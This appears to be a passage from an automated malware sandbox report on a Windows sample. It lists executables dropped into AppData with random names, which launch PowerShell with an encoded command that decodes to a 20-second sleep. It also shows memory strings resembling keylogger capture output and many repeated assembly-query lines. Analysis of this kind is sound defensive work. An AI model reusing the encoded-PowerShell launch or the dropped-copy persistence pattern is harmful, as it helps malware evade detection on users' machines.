                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess created: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000004.00000002.618527573.0000000002D15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (3/21/2023 4:57:31 AM)<br>{Win}{Win}r{Win}
                Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (3/21/2023 4:57:31 AM)<br>{Win}
                Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (3/21/2023 4:57:31 AM)<br>
                Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (3/21/2023 4:57:31 AM)<br>{Win}{Win}
                Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (3/21/2023 4:57:31 AM)<br>{Win}{Win}r{Win}r
                Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (3/21/2023 4:57:31 AM)<br>{Win}{Win}r
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformation
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformation
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
